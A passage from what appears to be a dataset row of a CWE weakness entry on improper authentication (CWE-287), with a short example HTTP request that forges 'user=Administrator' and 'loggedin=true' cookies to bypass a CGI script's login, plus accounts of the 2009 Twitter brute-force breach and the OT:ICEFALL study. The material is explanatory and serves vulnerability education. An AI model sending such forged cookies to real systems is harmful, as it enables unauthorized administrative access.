"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tGET /cgi-bin/vulnerable.cgi HTTP/1.1\n\tCookie: user=Administrator\n\tCookie: loggedin=true\n\t[body of request]\n```",
"IntroText": null,
"Language": null,
"Nature": "Attack",
"Reference": null
},
{
"BodyText": "By setting the loggedin cookie to \"true\", the attacker bypasses the entire authentication check. By using the \"Administrator\" value in the user cookie, the attacker also gains privileges to administer the software.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "In January 2009, an attacker was able to gain administrator access to a Twitter server because the server did not restrict the number of login attempts [REF-236]. The attacker targeted a member of Twitter's support team and was able to successfully guess the member's password using a brute force attack by guessing a large number of common words. After gaining access as the member of the support staff, the attacker used the administrator panel to gain access to 33 accounts that belonged to celebrities and politicians. Ultimately, fake Twitter messages were sent that appeared to come from the compromised accounts.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": "REF-236"
}
],
"ID": "DX-117"
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were \"insecure by design\" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "Multiple vendors did not use any authentication or used client-side authentication for critical functionality in their OT products.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": "DX-153"
}
] |
[
"Authentication"
] |
/data/images/CWE-287-Diagram.png
|
High
| null | 1
|
[
[
"284",
"287"
]
] |
[
"1390",
"295",
"306",
"645"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.